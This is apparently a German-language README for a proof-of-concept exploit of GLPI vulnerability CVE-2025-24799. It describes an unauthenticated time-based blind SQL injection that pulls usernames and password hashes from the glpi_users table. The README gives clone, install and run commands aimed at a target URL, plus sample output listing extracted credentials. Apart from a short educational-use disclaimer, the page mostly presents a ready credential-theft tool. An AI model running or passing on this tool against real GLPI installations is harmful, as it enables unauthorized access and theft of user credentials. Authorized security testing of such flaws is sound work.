
Nutzt GLPI CVE-2025-24799 über eine nicht authentifizierte zeitbasierte Blind-SQL-Injection aus, um Benutzernamen und Passwort-Hashes aus glpi_users für autorisierte Sicherheitstests zu extrahieren.
CVE-2025-24799 ist ein Proof-of-Concept-Exploit (PoC), der gegen GLPI gerichtet ist.
Dieser Exploit demonstriert nicht authentifizierte SQL-Injection (zeitbasiert blind), um Benutzerzugangsdaten zu extrahieren.
Haftungsausschluss: Dieser PoC dient ausschließlich zu Bildungszwecken. Verwende ihn nicht auf Systemen ohne Erlaubnis.
glpi_users und die erforderlichen Spalten (name und password)git clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
Abhängigkeiten:
requests,colorama,beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| Flag | Beschreibung | Erforderlich | Standard |
|---|---|---|---|
-u, --url | Ziel-URL | Ja | - |
Die Konsole zeigt:
[•][✔][✖][i]Beispiel:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
Ich bin ein aktiver Entwickler, der gerne Tools entwickelt und Wissen teilt. Du kannst mich über die folgenden Kanäle erreichen: